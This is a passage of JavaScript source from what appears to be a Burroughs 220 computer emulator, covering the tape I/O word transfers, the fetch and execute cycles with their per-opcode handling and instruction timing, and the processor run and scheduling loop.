completion of a magnetic tape operation. If this.AST is false, does nothing, as we have probably either been cleared or the Reset/Transfer switch has been activated. Otherwise, if "control" is true, the contents of "word" are processed as a tape control word and an appropriate branch is set up. Unconditionally terminates the tape I/O instruction. 
asyncOff() will be done by ioComplete() */ var aaaa = 0; // address where C & P will be stored var bbbb = 0; // address to load into P if (this.AST.value) { // if false, we've probably been cleared if (control) { this.D.set(word); bbbb = word%0x10000; aaaa = ((word - bbbb)/0x10000)%0x10000; if (word%0x20000000000 >= 0x10000000000) { // if sign bit is 1, bbbb = this.bcdAdd(bbbb, this.B.value, 4); // B-adjust the low-order 4 digits } this.E.set(aaaa); this.readMemory(); if (!this.MET.value) { this.IB.set(this.IB.value - this.IB.value%0x100000000 + (this.C.value%0x10000)*0x10000 + this.P.value%0x10000); this.writeMemory(); this.P.set(bbbb); } } Promise.resolve(true).then(this.boundIoComplete); } }; /**************************************/ B220Processor.prototype.magTapeSendWord = function magTapeSendWord(initialFetch) { /* Sends the next of data from memory to the tape control unit, starting at the current operand address in the C register. "initialFetch" is true if this call is the first to fetch words for a block. This causes the routine to save the current operand address in the control digits of C. Returns binary -1 if the processor has been cleared or a memory address error occurs, and the I/O must be aborted. Returns the BCD memory word otherwise */ var result; // return value this.asyncOff(); if (!this.AST.value) { result = -1; // we've probably been cleared } else { if (initialFetch) { this.CCONTROL = this.CADDR; // copy C address into control digits } this.E.set(this.CADDR); this.CADDR = this.bcdAdd(this.CADDR, 1, 4); this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address result = -1; } else { result = this.IB.value; this.D.set(result); } } this.asyncOn(); return result; }; /**************************************/ B220Processor.prototype.magTapeReceiveWord = function magTapeReceiveWord(initialStore, word) { /* Stores the next of data from the tape control unit to memory, starting at the current operand address in the C register. "initialStore" is true if this call is the first to store words for a block. This causes the routine to save the current operand address in the control digits of C. Returns binary -1 if the processor has been cleared or a memory address error occurs, and the I/O must be aborted. 
Returns 0 otherwise */ var result = 0; // return value var sign; // sign digit this.asyncOff(); if (!this.AST.value) { result = -1; // we've probably been cleared } else { if (initialStore) { this.CCONTROL = this.CADDR; // copy C address into control digits } this.E.set(this.CADDR); this.CADDR = this.bcdAdd(this.CADDR, 1, 4); this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.D.set(word); if (this.vDigit & 0x08) { // B-adjustment of words is enabled sign = (word - word%0x10000000000)/0x10000000000; if (sign & 0x08) { // this word is to be B-adjusted word = (sign&0x07)*0x10000000000 + word%0x10000000000 - word%0x10000 + this.bcdAdd(word, this.B.value, 4); this.C10.set(0); // reset carry toggle } } this.IB.set(word); this.writeMemory(); if (this.MET.value) { // invalid address result = -1; } } this.asyncOn(); return result; }; /*********************************************************************** * Fetch Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.fetchWordToC = function fetchWordToC(word) { /* Transfers "word" to the C register, applying B-register modification if necessary */ var dSign = ((word - word%0x10000000000)/0x10000000000)%2; this.DST.set(dSign); this.CADDR = word%0x10000; // C address this.COP = (word%0x1000000 - this.CADDR)/0x10000; // C op code this.CCONTROL = (word%0x10000000000 - word%0x1000000)/0x1000000;// C control digits if (!dSign) { this.C.set(word%0x10000000000); } else { this.CADDR = this.bcdAdd(this.CADDR, this.B.value, 4); this.C10.set(0); // reset carry toggle this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); } }; /**************************************/ B220Processor.prototype.fetch = function fetch(entryP) { /* Implements the Fetch cycle of the 220 processor. This is initiated either by pressing START on the Console with EXT=0 (Fetch), pressing STEP on the Console when the computer is stopped and EXT=0, during I/O when a control word (sign 6,7) is received from a peripheral device, or by the prior Operation Complete if the processor is in continuous mode. The "entryP" parameter indicates whether the instruction word is already in IB (true) or must be fetched from the address in P first (false) */ var dSign; // sign bit of IB register var word; // instruction word if (entryP) { // if instruction already loaded word = this.IB.value; } else { // if doing normal fetch this.E.set(this.P.value); word = this.readMemory(); } if (!this.MET.value) { // (should set IB sign bit 1=0 here, but to reduce overhead we don't bother) this.fetchWordToC(word); this.D.set(word); // D contains a copy of memory word if (!entryP && !this.PCOUNTSW) { this.P.inc(); // if not doing I/O, bump the program counter } } // if we're not locked in Fetch, switch to Execute cycle next. if (!this.FETCHEXECUTELOCKSW) { this.EXT.set(1); } this.execClock += 0.090; // fetch uniformly requires 90 us }; /*********************************************************************** * Execute Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.execute = function execute() { /* Implements the Execute cycle of the 220 processor. 
This is initiated either by pressing START on the console with the EXT=1 (Execute), or by the prior Operation Complete if the processor is in automatic mode */ var d; // scratch digit var w; // scratch word var x; // scratch variable or counter w = this.C.value; this.CCONTROL = (w - w%0x1000000)/0x1000000; // C register control digits this.COP = (w%0x1000000 - w%0x10000)/0x10000; // C register operation code this.CADDR = w%0x10000; // C register operand address this.opTime = 0; // clear the current instruction timer ++this.instructionCount; if (this.OFT.value && this.HCT.value && this.COP != 0x31) { this.setStop(); // if overflow and SOH and instruction is not BOF, stop return; // do not go through Operation Complete } this.E.set(0); this.IB.set(0); switch (this.COP) { case 0x00: //--------------------- HLT Halt this.setStop(); this.opTime = 0.010; this.operationComplete(); break; case 0x01: //--------------------- NOP No operation this.opTime = 0.010; this.operationComplete(); break; case 0x03: //--------------------- PRD Paper tape read this.opTime = 0.185; // just a guess... d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.rDigit = this.CCONTROL%0x10; this.sDigit = 1; // use word count in C (32) this.D.set(0); this.ioInitiate(); d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateNormal); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x04: //--------------------- PRB Paper tape read, branch this.opTime = 0.185; // just a guess... d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.rDigit = (this.CCONTROL & 0x0E) | 1; // force recognition of control words this.sDigit = 0; // do not use word count in C (32) this.D.set(0); this.ioInitiate(); d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateNormal); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x05: //--------------------- PRI Paper tape read, inverse format this.opTime = 0.185; // just a guess... d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.rDigit = (this.CCONTROL & 0x0E) | 1; // force recognition of control words this.sDigit = 1; // use word count in C (32) this.D.set(0); this.ioInitiate(); d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateInverse); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x06: //--------------------- PWR Paper tape write this.opTime = 0.185; // just a guess... 
d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.ioInitiate(); d = this.console.outputUnitSelect(d, this.boundConsoleOutputSign); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x07: //--------------------- PWI Paper tape write interrogate, branch d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; d = this.console.outputUnitSelect(d, B220Processor.emptyFunction); if (d < 0) { // if not ready, continue in sequence this.opTime = 0.015; } else { // if ready, branch to operand address this.P.set(this.CADDR); this.opTime = 0.035; } this.operationComplete(); break; case 0x08: //--------------------- KAD Keyboard add this.opTime = 0.005; this.D.set(0); this.setStop(); this.operationComplete(); break; case 0x09: //--------------------- SPO Supervisory print-out this.opTime = 0.185; // just a guess... this.ioInitiate(); d = this.console.outputUnitSelect(0, this.boundConsoleOutputSign); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x10: //--------------------- CAD/CAA Clear add/add absolute this.SUT.set(0); this.clearAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x11: //--------------------- CSU/CSA Clear subtract/subtract absolute this.SUT.set(1); this.clearAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x12: //--------------------- ADD/ADA Add/add absolute this.SUT.set(0); this.integerAdd(this.CCONTROL % 0x10 == 1, false); this.operationComplete(); break; case 0x13: //--------------------- SUB/SUA Subtract/subtract absolute this.SUT.set(1); this.integerAdd(this.CCONTROL % 0x10 == 1, false); this.operationComplete(); break; case 0x14: //--------------------- MUL Multiply this.integerMultiply(); this.operationComplete(); break; case 0x15: //--------------------- DIV Divide this.integerDivide(); this.operationComplete(); break; case 0x16: //--------------------- RND Round this.opTime = 0.015; // minimum instruction timing this.SUT.set(0); w = this.A.value%0x10000000000; this.SGT.set(((this.A.value - w)/0x10000000000)%2); if (this.R.value%0x10000000000 >= 0x5000000000) { // Add round-off (as the carry bit) to absolute value of A. 
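        // Illustrative: if A holds +123 and the high-order digit of R is 5 or
        // more, the carry added below rounds A to +124.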
this.A.value -= w; // preserve the A sign digit w = this.bcdAdd(w, 0, 11, 0, 1); if (w >= 0x10000000000) { this.OFT.set(1); // overflow occurred w -= 0x10000000000; // remove the overflow bit from A } this.A.set(this.A.value + w); // restore the A sign digit this.opTime += 0.060; // account for add cycle } this.R.set(0); // unconditionally clear R this.operationComplete(); break; case 0x17: //--------------------- EXT Extract this.integerExtract(); this.operationComplete(); break; case 0x18: //--------------------- CFA/CFR Compare field A/R this.compareField(); this.operationComplete(); break; case 0x19: //--------------------- ADL Add to location this.SUT.set(0); this.integerAdd(false, true); // result to D register this.IB.set(this.D.value); this.writeMemory(); // E still contains the operand address this.opTime += 0.70; // additional time over standard ADD this.operationComplete(); break; case 0x20: //--------------------- IBB Increase B, branch w = this.B.value; this.B.add(this.CCONTROL); if (this.B.value < w) { this.opTime = 0.040; } else { this.P.set(this.CADDR); this.opTime = 0.060; } this.operationComplete(); break; case 0x21: //--------------------- DBB Decrease B, branch w = this.B.value; this.B.sub(this.CCONTROL); if (this.B.value > w) { this.opTime = 0.040; } else { this.P.set(this.CADDR); this.opTime = 0.060; } this.operationComplete(); break; case 0x22: //--------------------- FAD/FAA Floating add/add absolute this.SUT.set(0); this.floatingAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x23: //--------------------- FSU/FSA Floating subtract/subtract absolute this.SUT.set(1); this.floatingAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x24: //--------------------- FMU Floating multiply this.floatingMultiply(); this.operationComplete(); break; case 0x25: //--------------------- FDV Floating divide this.floatingDivide(0); this.operationComplete(); break; case 0x26: //--------------------- IFL Increase field location this.increaseFieldLocation(); this.operationComplete(); break; case 0x27: //--------------------- DFL Decrease field location this.decreaseFieldLocation(false); this.operationComplete(); break; case 0x28: //--------------------- DLB Decrease field location, load B this.decreaseFieldLocation(true); this.operationComplete(); break; case 0x29: //--------------------- RTF Record transfer this.opTime = 0.040; do { d = this.bcdAdd(this.CCONTROL, 0x990, 3); // decrement word count this.CCONTROL += d - this.CCONTROL%0x1000; this.E.set(this.CADDR); this.CADDR = this.bcdAdd(this.CADDR, 1, 4); // increment source address this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address break; // out of do loop } else { this.E.set(this.B.value); this.B.inc(); // increment destination address this.opTime += 0.060; this.writeMemory(); if (this.MET.value) { break; // out of do loop } } } while (this.CCONTROL%0x1000 > 0x00F); this.operationComplete(); break; case 0x30: //--------------------- BUN Branch, unconditionally this.opTime = 0.035; this.P.set(this.CADDR); this.operationComplete(); break; case 0x31: //--------------------- BOF Branch, overflow this.opTime = 0.015; if (this.OFT.value) { this.P.set(this.CADDR); this.OFT.set(0); this.opTime += 0.020; } this.operationComplete(); break; case 0x32: //--------------------- BRP Branch, repeat this.opTime = 0.015; if (this.RPT.value) { this.P.set(this.CADDR); this.RPT.set(0); this.opTime += 0.020; } this.operationComplete(); 
break; case 0x33: //--------------------- BSA Branch, sign A this.opTime = 0.085; this.SUT.set(1); if ((this.A.value - this.A.value%0x10000000000)/0x10000000000 == this.CCONTROL%0x10) { this.P.set(this.CADDR); this.opTime += 0.020; } this.operationComplete(); break; case 0x34: //--------------------- BCH/BCL Branch, comparison high/low this.opTime = 0.015; if (this.UET.value) { if (this.HIT.value) { // HIGH condition if (this.CCONTROL%0x10 != 1) { // BCH -- test for high condition this.P.set(this.CADDR); this.opTime += 0.020; } } else { // LOW condition if (this.CCONTROL%0x10 == 1) { // BCL -- test for low condition this.P.set(this.CADDR); this.opTime += 0.020; } } } else { if (this.HIT.value) { // EQUAL condition // continue in sequence } else { // no condition is set this.setProgramCheck(1); } } this.operationComplete(); break; case 0x35: //--------------------- BCE/BCU Branch, comparison equal/unequal this.opTime = 0.015; if (this.UET.value) { // UNEQUAL condition if (this.CCONTROL%0x10 == 1) { // BCU -- test for unequal condition this.P.set(this.CADDR); this.opTime += 0.020; } else { // continue in sequence } } else { if (this.HIT.value) { // EQUAL condition if (this.CCONTROL%0x10 != 1) { // BCE -- test for equal condition this.P.set(this.CADDR); this.opTime += 0.020; } } else { // no condition is set this.setProgramCheck(1); } } this.operationComplete(); break; case 0x36: //--------------------- BFA Branch, field A this.branchField(this.A.value); this.operationComplete(); break; case 0x37: //--------------------- BFR Branch, field R this.branchField(this.R.value); this.operationComplete(); break; case 0x38: //--------------------- BCS Branch, control switch this.opTime = 0.015; // minimum instruction timing d = (this.CCONTROL - this.CCONTROL%0x1000)/0x1000; if (this["PC" + d.toString() + "SW"]) { this.opTime += 0.020; this.P.set(this.CADDR); } this.operationComplete(); break; case 0x39: //--------------------- SOR/SOH/IOM Set overflow remember/halt, Interrogate overflow mode // Note: it's not clear what should happen if the variant digit (41) is // other than 0, 1, or 2. We assume the digit is used as a bit mask. 
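        // Under that bit-mask assumption, variant digits 2, 3, 6 and 7 select
        // IOM below, variants 1, 5 and 9 select SOH, and variants 0, 4 and 8
        // fall through to SOR.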
this.opTime = 0.015; switch (true) { case (this.CCONTROL & 0x02) == 0x02: // IOM: Interrogate overflow mode if (this.HCT.value) { this.P.set(this.CADDR); this.opTime += 0.020; } break; case (this.CCONTROL & 0x01) == 0x01: // SOH: Set overflow halt this.HCT.set(1); if (this.OFT.value) { this.setStop(); } break; default: // SOR: Set overflow remember this.HCT.set(0); break; } this.operationComplete(); break; case 0x40: //--------------------- ST* Store A/R/B this.storeRegister(); this.operationComplete(); break; case 0x41: //--------------------- LDR Load R this.opTime = 0.085; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { this.D.set(this.IB.value); this.R.set(this.IB.value); } this.operationComplete(); break; case 0x42: //--------------------- LDB/LBC Load B/B complement this.opTime = 0.090; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { this.D.set(this.IB.value); if (this.CCONTROL%0x10 == 1) { // Load B complement this.B.set(this.bcdAdd(this.IB.value, 0, 4, 1, 1)); } else { // Load B this.B.set(this.IB.value%0x10000); } } this.operationComplete(); break; case 0x43: //--------------------- LSA Load sign A this.opTime = 0.015 this.A.set(this.A.value%0x10000000000 + (this.CCONTROL%0x10)*0x10000000000); this.operationComplete(); break; case 0x44: //--------------------- STP Store P this.opTime = 0.095; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { this.IB.set(this.IB.value - this.IB.value%0x10000 + this.bcdAdd(this.P.value, 1, 4)); this.D.set(this.IB.value); this.writeMemory(); } this.operationComplete(); break; case 0x45: //--------------------- CL* Clear A/R/B this.opTime = 0.010; if (this.CCONTROL & 0x01) { this.A.set(0); } if (this.CCONTROL & 0x02) { this.R.set(0); } if (this.CCONTROL & 0x04) { this.B.set(0); } this.operationComplete(); break; case 0x46: //--------------------- CLL Clear location this.opTime = 0.025; this.E.set(this.CADDR); this.writeMemory(); // IB is still zero this.operationComplete(); break; case 0x48: //--------------------- SR* Shift right A/A and R/A with sign x = B220Processor.bcdBinary(this.CADDR % 0x20); this.opTime = 0.020 + x*0.005; this.DC.set(B220Processor.binaryBCD(20-x)); switch (this.CCONTROL%0x10) { case 1: // SRT: Shift Right A and R w = this.A.value % 0x10000000000; // A sign is not affected this.R.value %= 0x10000000000; // discard the R sign while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10; this.R.value = (this.R.value - this.R.value%0x10)/0x10 + d*0x1000000000; this.DC.inc(); } this.R.set(this.A.value - this.A.value%0x10000000000 + this.R.value); // copy A sign into R this.A.set(this.A.value - this.A.value%0x10000000000 + w); // restore the A sign break; case 2: // SRS: Shift Right A with Sign w = this.A.value % 0x100000000000; // A sign is included while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10; this.DC.inc(); } this.A.set(w); break; default: // SRA: Shift Right A w = this.A.value % 0x10000000000; // A sign is not affected while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10; this.DC.inc(); } this.A.set(this.A.value - this.A.value%0x10000000000 + w); // restore the A sign break; } // switch on control digit this.operationComplete(); break; case 0x49: //--------------------- SL* Shift (rotate) left A/A and R/A with sign switch (this.CCONTROL%0x10) { case 1: // SLT: Shift Left A and R x = this.CADDR % 0x20; this.opTime = 0.210 - x*0.005; this.DC.set(x); w = this.R.value % 0x10000000000; // the R sign is not affected this.A.value %= 0x10000000000; // discard the A 
sign for now while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10 + (this.A.value%0x10)*0x1000000000; this.A.value = (this.A.value - this.A.value%0x10)/0x10 + d*0x1000000000; this.DC.inc(); } this.A.set(this.R.value - this.R.value%0x10000000000 + this.A.value); // copy R sign into A this.R.set(this.R.value - this.R.value%0x10000000000 + w); // restore the R sign break; case 2: // SLS: Shift Left A with Sign w = this.A.value % 0x100000000000; // the A sign is included in the rotate d = w % 0x10; // always do one more rotate right w = (w-d)/0x10 + d*0x10000000000; // than the count calls for x = this.CADDR % 0x20; if (x >= 0x10) { x -= 0x10; // if the count is at least 10 d = w % 0x10; // do one additional rotate right w = (w-d)/0x10 + d*0x10000000000; } this.opTime = 0.160 - x*0.005; this.DC.set(0x10+x); while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10 + d*0x10000000000; this.DC.inc(); } this.A.set(w); break; default: // SLA: Shift Left A x = this.CADDR % 0x10; this.opTime = 0.160 - x*0.005; this.DC.set(0x10+x); w = this.A.value % 0x10000000000; // discard the A sign for now while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10 + d*0x1000000000; this.DC.inc(); } this.A.set(this.A.value - this.A.value%0x10000000000 + w); // restore the A sign break; } // switch on control digit this.operationComplete(); break; case 0x50: //--------------------- MTS/MFS/MLS/MRW/MDA Magnetic tape search/field search/lane select/rewind this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.vDigit = this.CCONTROL%0x10; this.ioInitiate(); if (this.vDigit & 0x08) { // MRW/MDA: rewind, with or without lockout this.magTape.rewind(this.D.value); } else if (this.vDigit & 0x04) { // MLS: lane select this.magTape.laneSelect(this.D.value); } else { // MTS/MFS: search or field search if (this.D.value%0x80000000000 < 0x40000000000) { // sign 4-bit = 0: full-word search this.magTape.search(this.D.value, 0); } else { // partial-word search based on sL00 in B this.magTape.search(this.D.value, this.B.value); } } } break; case 0x51: //--------------------- MTC/MFC Magnetic tape scan/field scan this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); if (this.D.value%0x80000000000 < 0x40000000000) { // sign 4-bit = 0: full-word search this.magTape.scan(this.D.value, 0); } else { // partial-word search based on sL00 in B this.magTape.scan(this.D.value, this.B.value); } } break; case 0x52: //--------------------- MRD Magnetic tape read this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.vDigit = this.CCONTROL%0x10; // controlword and B-mod bits this.ioInitiate(); this.magTape.read(this.D.value, false); } break; case 0x53: //--------------------- MRR Magnetic tape read, record this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.vDigit = this.CCONTROL%0x10; // controlword and B-mod bits this.ioInitiate(); this.magTape.read(this.D.value, true); } break; case 0x54: //--------------------- MIW Magnetic tape initial write this.opTime = 0.160; if (!this.magTape) { 
this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); this.magTape.initialWrite(this.D.value, false); } break; case 0x55: //--------------------- MIR Magnetic tape initial write, record this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); this.magTape.initialWrite(this.D.value, true); } break; case 0x56: //--------------------- MOW Magnetic tape overwrite this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); this.magTape.overwrite(this.D.value, false); } break; case 0x57: //--------------------- MOR Magnetic tape overwrite, record this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); this.magTape.overwrite(this.D.value, true); } break; case 0x58: //--------------------- MPF/MPB/MIE Magnetic tape position forward/backward/at end this.opTime = 0.130; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); switch (this.CCONTROL%0x10) { case 1: // MPB: position tape backward this.magTape.positionBackward(this.D.value); break; case 2: // MPE: position tape at end this.magTape.positionAtEnd(this.D.value); break; default: // MPF: position tape forward this.magTape.positionForward(this.D.value); break; } // switch on operation variant } break; case 0x59: //--------------------- MIB/MIE Magnetic tape interrogate, branch/end of tape, branch if (!this.magTape) { this.opTime = 0.01; } else if (this.magTape.controlBusy) { this.opTime = 0.01; } else { this.opTime = 0.14; if (this.CCONTROL%0x10 == 1) { // MIE if (this.magTape.testUnitAtEOT(this.D.value)) { this.P.set(this.CADDR); this.opTime += 0.020; } } else { // MIB if (this.magTape.testUnitReady(this.D.value)) { this.P.set(this.CADDR); this.opTime += 0.020; } } } this.operationComplete(); break; case 0x60: //--------------------- CRD Card read this.opTime = 1.600; // rough minimum estimage this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.rDigit = this.CCONTROL%0x10; this.vDigit = (this.CCONTROL >>> 4)%0x10; this.ioInitiate(); d = this.cardatron.inputInitiate(this.selectedUnit, this.rDigit, this.boundCardatronReceiveWord); if (d < 0) { // invalid unit this.setCardatronCheck(1); this.ioComplete(true); } } break; case 0x61: //--------------------- CWR Card write this.opTime = 1.600; // rough minimum estimage this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.rDigit = this.CCONTROL%0x10; this.vDigit = (this.CCONTROL >>> 4)%0x10; this.ioInitiate(); d = this.cardatron.outputInitiate(this.selectedUnit, this.rDigit, this.vDigit, this.boundCardatronOutputWord, this.boundCardatronOutputFinished); if (d < 0) { // invalid unit this.setCardatronCheck(1); this.ioComplete(true); } } break; case 0x62: //--------------------- CRF Card read, format load this.opTime = 1.600; // 
rough minimum estimage this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.rDigit = this.CCONTROL%0x10; this.ioInitiate(); d = this.cardatron.inputFormatInitiate(this.selectedUnit, this.rDigit, this.boundCardatronOutputWord, this.boundCardatronOutputFinished); if (d < 0) { // invalid unit this.setCardatronCheck(1); this.ioComplete(true); } } break; case 0x63: //--------------------- CWF Card write, format load this.opTime = 1.600; // rough minimum estimage this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.rDigit = this.CCONTROL%0x10; this.ioInitiate(); d = this.cardatron.outputFormatInitiate(this.selectedUnit, this.rDigit, this.boundCardatronOutputWord, this.boundCardatronOutputFinished); if (d < 0) { // invalid unit this.setCardatronCheck(1); this.ioComplete(true); } } break; case 0x64: //--------------------- CRI Card read interrogate, branch this.opTime = 0.265; // average this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; d = this.cardatron.inputReadyInterrogate(this.selectedUnit); if (d < 0) { // invalid unit this.setCardatronCheck(1); } else if (d > 0) { this.opTime += 0.020; this.P.set(this.CADDR); } } this.operationComplete(); break; case 0x65: //--------------------- CWI Card write interrogate, branch this.opTime = 0.265; // average this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; d = this.cardatron.outputReadyInterrogate(this.selectedUnit); if (d < 0) { // invalid unit this.setCardatronCheck(1); } else if (d > 0) { this.opTime += 0.020; this.P.set(this.CADDR); } } this.operationComplete(); break; case 0x66: //--------------------- HPW High speed printer write this.setProgramCheck(1); this.operationComplete(); break; case 0x67: //--------------------- HPI High speed printer interrogate, branch this.setProgramCheck(1); this.operationComplete(); break; default: //--------------------- Invalid op code -- set Program Check alarm this.setProgramCheck(1); this.operationComplete(); break; } // switch this.COP }; /*********************************************************************** * Processor Run Control * ***********************************************************************/ /**************************************/ B220Processor.prototype.operationComplete = function operationComplete() { /* Implements Operation Complete for the Execute cycle. 
If we're not locked in Execute, switch to Fetch cycle next */ if (this.FETCHEXECUTELOCKSW != 1) { this.EXT.set(0); // set to FETCH state } this.execClock += this.opTime; if (this.ORDERCOMPLEMENTSW) { this.C.flipBit(16); // complement low order bit of op code this.COP ^= 0x01; } if (!this.RUT.value) { // halted this.stop(); } else if (this.SST.value) { this.stop(); // single-stepping } else if (this.SONSW) { if (this.STOCSW) { // check for post-execute S-to-C stop if (this.SUNITSSW) { if (this.C.value%0x10 == this.S.value%0x10) { this.stop(); } } else if (this.C.value%0x10000 == this.S.value) { this.stop(); } } } }; /**************************************/ B220Processor.prototype.ioComplete = function ioComplete(restart) { /* Implements completion of the Execute cycle for an I/O instruction that has been executing asynchronously. If "restart" is true, the Processor will resume automatic operation */ this.AST.set(0); this.asyncOff(); this.procOff(); this.operationComplete(); if (restart && this.RUT.value) { this.schedule(); } }; /**************************************/ B220Processor.prototype.ioInitiate = function ioInitiate() { /* Initiates asynchronous mode of the processor for I/O */ this.AST.set(1); this.asyncOn(); this.execLimit = 0; // kill the run() loop }; /**************************************/ B220Processor.prototype.traceState = function traceState() { /* Logs a subset of the Processor state to the Javascript console for debugging purposes */ console.log("P=" + B220Processor.padLeft(this.P.value.toString(16), 4) + " | B=" + B220Processor.padLeft(this.B.value.toString(16), 4) + " | C=" + B220Processor.formatWord(this.C.value).substring(2) + " | A=" + B220Processor.formatWord(this.A.value) + " | R=" + B220Processor.formatWord(this.R.value) + " | D=" + B220Processor.formatWord(this.D.value) + " | E=" + B220Processor.padLeft(this.E.value.toString(16), 4) + " | UET=" + this.UET.value + " | HIT=" + this.HIT.value + " | OFT=" + this.OFT.value + " | RPT=" + this.RPT.value); }; /**************************************/ B220Processor.prototype.run = function run() { /* Main execution control loop for the processor. Called from this.schedule() to initiate a time slice. Will continue fetch/execute cycles until the time slice expires, a stop condition is detected, or AST (asynchronous toggle) is set indicating the processor has been suspended during an I/O. This routine effectively implements Operation Complete (O.C.) for the Fetch and Execute cycles, although it is more of a "ready for next operation" function, determining if there is a stop condition, or whether to do a Fetch or Execute cycle next. The fetch() and execute() methods exit back here, and in most cases we simply step to the next cycle. 
In the case of asynchronous operation, however, we simply exit, and the I/O interface will call this.schedule() to restart execution again once memory transfers have completed */ this.execLimit = this.execClock + B220Processor.timeSlice; do { if (this.EXT.value) { // enter EXECUTE cycle this.execute(); } else { // enter FETCH cycle if (this.tracing) { this.traceState(); // DEBUG ONLY } if (this.SONSW) { // check for post-fetch S-to-P stop if (this.STOPSW) { // must check before P is incremented in fetch() if (this.SUNITSSW) { if (this.P.value%0x10 == this.S.value%0x10) { this.stop(); } } else if (this.P.value == this.S.value) { this.stop(); } } } this.fetch(false); if (this.SST.value) { this.stop(); // single-stepping } break; } } while (this.execClock < this.execLimit); }; /**************************************/ B220Processor.prototype.schedule = function schedule() { /* Schedules the next processor time slice and attempts to throttle performance to approximate that of a real B220. It establishes a time slice in terms of a number milliseconds each and calls run() to execute for at most that amount of time. run() counts up instruction times until it reaches this limit or some terminating event (such as a stop), then exits back here. If the processor remains active, this routine will reschedule itself after an appropriate delay, thereby throttling the performance and allowing other modules to share the single Javascript execution thread */ var delayTime = 0; // delay from/until next run() for this processor, ms var stamp = performance.now(); // ending time for the delay and the run() call, ms this.scheduler = 0; // If run() has been called by a throttling delay, compute the delay stats. if (this.delayLastStamp > 0) { delayTime = stamp - this.delayLastStamp; this.procSlack += delayTime; // Compute the exponential weighted average of scheduling delay deviation. 